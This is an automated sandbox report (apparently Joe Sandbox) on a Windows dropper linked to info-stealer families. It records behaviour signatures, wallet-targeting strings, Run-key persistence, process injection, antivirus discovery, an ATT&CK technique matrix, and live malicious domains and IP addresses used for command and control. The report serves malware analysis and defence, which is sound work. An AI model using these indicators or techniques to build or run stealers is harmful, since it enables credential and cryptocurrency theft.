                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeQueries volume information: C:\Users\user\AppData\Roaming\57lklPjdPc.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeQueries volume information: C:\Users\user\AppData\Roaming\57lklPjdPc.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeQueries volume information: C:\Users\user\AppData\Roaming\l6E.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: l6E.exe, 0000000C.00000002.2317832890.0000000000F04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                  Source: Amcache.hve.17.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.17.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.17.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: l6E.exe, 0000000C.00000002.2317832890.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, l6E.exe.0.drBinary or memory string: AVP.exe
                  Source: Amcache.hve.17.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.443c110.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.457c130.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.443c110.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.6e40000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.6e40000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.457c130.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.4208692705.000000000457C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4219277118.0000000006E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4208692705.00000000043C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.443c110.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.457c130.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.443c110.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.6e40000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.6e40000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.457c130.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.4219277118.0000000006E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                  Source: 57lklPjdPc.exe, 00000000.00000002.4214856571.0000000005C4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBs
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Web3
                  Source: 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                  Source: 57lklPjdPc.exe, 00000000.00000002.4208692705.000000000457C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.443c110.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.457c130.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.443c110.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.6e40000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.6e40000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.457c130.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.4208692705.000000000457C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4219277118.0000000006E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.4208692705.00000000043C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.443c110.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.457c130.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.443c110.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.6e40000.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.6e40000.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.57lklPjdPc.exe.457c130.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.4219277118.0000000006E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  Valid Accounts331
                  Windows Management Instrumentation
                  1
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  OS Credential Dumping1
                  File and Directory Discovery
                  Remote Services11
                  Archive Collected Data
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter
                  1
                  DLL Side-Loading
                  412
                  Process Injection
                  111
                  Deobfuscate/Decode Files or Information
                  LSASS Memory223
                  System Information Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  1
                  Non-Standard Port
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  PowerShell
                  1
                  Registry Run Keys / Startup Folder
                  1
                  Registry Run Keys / Startup Folder
                  4
                  Obfuscated Files or Information
                  Security Account Manager1
                  Query Registry
                  SMB/Windows Admin Shares1
                  Screen Capture
                  2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                  Software Packing
                  NTDS541
                  Security Software Discovery
                  Distributed Component Object Model2
                  Clipboard Data
                  113
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp
                  LSA Secrets2
                  Process Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials351
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry
                  Proc Filesystem1
                  Remote System Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt351
                  Virtualization/Sandbox Evasion
                  /etc/passwd and /etc/shadow1
                  System Network Configuration Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron412
                  Process Injection
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1513633 Sample: 57lklPjdPc.exe Startdate: 19/09/2024 Architecture: WINDOWS Score: 100 50 strompreis.ru 2->50 52 eemmbryequo.shop 2->52 54 windowsupdatebg.s.llnwi.net 2->54 60 Multi AV Scanner detection for domain / URL 2->60 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 16 other signatures 2->66 10 57lklPjdPc.exe 1 6 2->10         started        15 57lklPjdPc.exe 3 2->15         started        17 57lklPjdPc.exe 2 2->17         started        signatures3 process4 dnsIp5 58 strompreis.ru 45.11.229.96, 49730, 49738, 56001 ALPHAONE-ASUS Germany 10->58 42 C:\Users\user\AppData\Roaming\l6E.exe, PE32 10->42 dropped 44 C:\Users\user\AppData\...\57lklPjdPc.exe, PE32 10->44 dropped 46 C:\Users\user\AppData\...\XgrafwGYiYyF.bat, DOS 10->46 dropped 80 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 10->80 82 Suspicious powershell command line found 10->82 84 Found many strings related to Crypto-Wallets (likely being stolen) 10->84 92 4 other signatures 10->92 19 cmd.exe 1 10->19         started        22 powershell.exe 1 11 10->22         started        48 C:\Users\user\AppData\...\57lklPjdPc.exe.log, CSV 15->48 dropped 86 Antivirus detection for dropped file 15->86 88 Multi AV Scanner detection for dropped file 15->88 90 Machine Learning detection for dropped file 15->90 file6 signatures7 process8 signatures9 68 Uses ping.exe to sleep 19->68 70 Uses ping.exe to check the status of other devices and networks 19->70 24 l6E.exe 2 19->24         started        27 conhost.exe 19->27         started        29 PING.EXE 1 19->29         started        31 chcp.com 1 19->31         started        33 conhost.exe 22->33         started        process10 signatures11 72 Multi AV Scanner detection for dropped file 24->72 74 Contains functionality to inject code into remote processes 24->74 76 Writes to foreign memory regions 24->76 78 3 other signatures 24->78 35 RegAsm.exe 24->35         started        38 conhost.exe 24->38         started        process12 dnsIp13 56 eemmbryequo.shop 104.21.39.11, 443, 49740, 49741 CLOUDFLARENETUS United States 35->56 40 WerFault.exe 35->40         started        process14

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  57lklPjdPc.exe58%ReversingLabsByteCode-MSIL.Dropper.Marsilia
                  57lklPjdPc.exe62%VirustotalBrowse
                  57lklPjdPc.exe100%AviraTR/Dropper.MSIL.Gen8
                  57lklPjdPc.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\XgrafwGYiYyF.bat100%AviraBAT/Delbat.C
                  C:\Users\user\AppData\Roaming\57lklPjdPc.exe100%AviraTR/Dropper.MSIL.Gen8
                  C:\Users\user\AppData\Roaming\57lklPjdPc.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\57lklPjdPc.exe58%ReversingLabsByteCode-MSIL.Dropper.Marsilia
                  C:\Users\user\AppData\Roaming\57lklPjdPc.exe62%VirustotalBrowse
                  C:\Users\user\AppData\Roaming\l6E.exe29%ReversingLabsWin32.Trojan.Generic
                  C:\Users\user\AppData\Roaming\l6E.exe54%VirustotalBrowse
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  strompreis.ru3%VirustotalBrowse
                  eemmbryequo.shop0%VirustotalBrowse
                  windowsupdatebg.s.llnwi.net0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://upx.sf.net0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                  https://stackoverflow.com/q/14436606/233540%Avira URL Cloudsafe
                  tryyudjasudqo.shop100%Avira URL Cloudmalware
                  https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll0%Avira URL Cloudsafe
                  reggwardssdqw.shop100%Avira URL Cloudmalware
                  licenseodqwmqn.shop100%Avira URL Cloudmalware
                  https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg0%Avira URL Cloudsafe
                  reggwardssdqw.shop0%VirustotalBrowse
                  https://stackoverflow.com/q/14436606/233540%VirustotalBrowse
                  tryyudjasudqo.shop0%VirustotalBrowse
                  https://github.com/Pester/Pester0%Avira URL Cloudsafe
                  https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll0%VirustotalBrowse
                  https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe0%Avira URL Cloudsafe
                  https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe0%Avira URL Cloudsafe
                  licenseodqwmqn.shop0%VirustotalBrowse
                  relaxatinownio.shop100%Avira URL Cloudmalware
                  https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg0%VirustotalBrowse
                  https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe0%VirustotalBrowse
                  keennylrwmqlw.shop100%Avira URL Cloudmalware
                  https://aka.ms/pscore6lB0%Avira URL Cloudsafe
                  https://stackoverflow.com/q/2152978/23354rCannot0%Avira URL Cloudsafe
                  relaxatinownio.shop0%VirustotalBrowse
                  https://github.com/Pester/Pester1%VirustotalBrowse
                  https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe0%VirustotalBrowse
                  https://stackoverflow.com/q/11564914/23354;0%Avira URL Cloudsafe
                  keennylrwmqlw.shop0%VirustotalBrowse
                  https://stackoverflow.com/q/2152978/23354rCannot0%VirustotalBrowse
                  http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                  tesecuuweqo.shop100%Avira URL Cloudmalware
                  https://aka.ms/pscore6lB0%VirustotalBrowse
                  tendencctywop.shop100%Avira URL Cloudmalware
                  https://eemmbryequo.shop/api100%Avira URL Cloudmalware
                  eemmbryequo.shop100%Avira URL Cloudmalware
                  https://stackoverflow.com/q/11564914/23354;0%VirustotalBrowse
                  eemmbryequo.shop0%VirustotalBrowse
                  tesecuuweqo.shop9%VirustotalBrowse
                  https://eemmbryequo.shop/api17%VirustotalBrowse
                  tendencctywop.shop0%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  strompreis.ru
                  45.11.229.96
                  truetrueunknown
                  eemmbryequo.shop
                  104.21.39.11
                  truetrueunknown
                  windowsupdatebg.s.llnwi.net
                  87.248.204.0
                  truefalseunknown
                  NameMaliciousAntivirus DetectionReputation
                  tryyudjasudqo.shoptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  reggwardssdqw.shoptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  licenseodqwmqn.shoptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  relaxatinownio.shoptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  keennylrwmqlw.shoptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  tesecuuweqo.shoptrue
                  • 9%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  tendencctywop.shoptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  https://eemmbryequo.shop/apitrue
                  • 17%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  eemmbryequo.shoptrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1748204498.00000000057AD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://stackoverflow.com/q/14436606/2335457lklPjdPc.exe, 00000000.00000002.4201551200.0000000003338000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000003.00000002.2012521370.0000000002D92000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1740782513.0000000004896000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1740782513.0000000004896000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000001.00000002.1748204498.00000000057AD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003338000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000003.00000002.2012521370.0000000002D92000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.1748204498.00000000057AD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://upx.sf.netAmcache.hve.17.drfalse
                  • URL Reputation: safe
                  unknown
                  https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.execABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003338000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1740782513.0000000004896000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003338000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000003.00000002.2012521370.0000000002D92000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000003.00000002.2012521370.0000000002D92000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1740782513.0000000004741000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://stackoverflow.com/q/2152978/23354rCannot57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003338000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000003.00000002.2012521370.0000000002D92000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://stackoverflow.com/q/11564914/23354;57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003338000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmp, 57lklPjdPc.exe, 00000003.00000002.2012521370.0000000002D92000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/powershell.exe, 00000001.00000002.1748204498.00000000057AD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1748204498.00000000057AD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name57lklPjdPc.exe, 00000000.00000002.4201551200.0000000003158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1740782513.0000000004741000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  45.11.229.96
                  strompreis.ruGermany
                  397525ALPHAONE-ASUStrue
                  104.21.39.11
                  eemmbryequo.shopUnited States
                  13335CLOUDFLARENETUStrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1513633
                  Start date and time:2024-09-19 02:24:07 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 10m 33s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:19
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:57lklPjdPc.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@20/16@2/2
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:
                  • Successful, ratio: 86%
                  • Number of executed functions: 571
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 87.248.204.0, 20.189.173.22
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target 57lklPjdPc.exe, PID 7460 because it is empty
                  • Execution Graph export aborted for target 57lklPjdPc.exe, PID 7780 because it is empty
                  • Execution Graph export aborted for target 57lklPjdPc.exe, PID 8060 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 7508 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  TimeTypeDescription
                  01:25:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 57lklPjdPc C:\Users\user\AppData\Roaming\57lklPjdPc.exe
                  01:25:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 57lklPjdPc C:\Users\user\AppData\Roaming\57lklPjdPc.exe
                  20:25:04API Interceptor3x Sleep call for process: powershell.exe modified
                  20:25:11API Interceptor13002313x Sleep call for process: 57lklPjdPc.exe modified
                  20:26:03API Interceptor1x Sleep call for process: RegAsm.exe modified
                  20:26:15API Interceptor1x Sleep call for process: WerFault.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  45.11.229.96temp_script.batGet hashmaliciousPureLog StealerBrowse
                    4FwNHRnnXb.exeGet hashmaliciousPureLog StealerBrowse
                      104.21.39.11log-analyzer.exeGet hashmaliciousLummaC, MicroClipBrowse
                        file.exeGet hashmaliciousLummaC, VidarBrowse
                          file.exeGet hashmaliciousLummaCBrowse
                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                              file.exeGet hashmaliciousLummaCBrowse
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                strompreis.rutemp_script.batGet hashmaliciousPureLog StealerBrowse
                                • 45.11.229.96
                                4FwNHRnnXb.exeGet hashmaliciousPureLog StealerBrowse
                                • 45.11.229.96
                                eemmbryequo.shopl6E.exeGet hashmaliciousLummaCBrowse
                                • 172.67.142.26
                                file.exeGet hashmaliciousLummaCBrowse
                                • 172.67.142.26
                                log-analyzer.exeGet hashmaliciousLummaC, MicroClipBrowse
                                • 104.21.39.11
                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                • 172.67.142.26
                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                • 104.21.39.11
                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                • 172.67.142.26
                                file.exeGet hashmaliciousLummaCBrowse
                                • 104.21.39.11
                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                • 104.21.39.11
                                file.exeGet hashmaliciousLummaCBrowse
                                • 172.67.142.26
                                file.exeGet hashmaliciousLummaCBrowse
                                • 104.21.39.11
                                windowsupdatebg.s.llnwi.nethttps://aisthd.xyz/Get hashmaliciousUnknownBrowse
                                • 87.248.204.0
                                https://help-connect-hhelp.gitbook.io/usGet hashmaliciousHTMLPhisherBrowse
                                • 87.248.204.0
                                http://is-start-trizor.webflow.io/Get hashmaliciousUnknownBrowse
                                • 87.248.204.0
                                http://methakasloin.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                • 41.63.96.128
                                https://longhaired-lackadaisical-run.glitch.me/step2.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 87.248.205.0
                                https://cejecuu4.xyzGet hashmaliciousUnknownBrowse
                                • 178.79.208.1
                                http://qualificationwarning.vercel.app/id.htmlGet hashmaliciousUnknownBrowse
                                • 87.248.205.0
                                https://urlz.fr/s9ArGet hashmaliciousUnknownBrowse
                                • 46.228.146.0
                                https://ch-kappo.com/de/receive/79469380Get hashmaliciousUnknownBrowse
                                • 87.248.205.0
                                https://pancake-frontend-dejmy38ut-chefilip.vercel.app/votingGet hashmaliciousUnknownBrowse
                                • 178.79.208.1
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
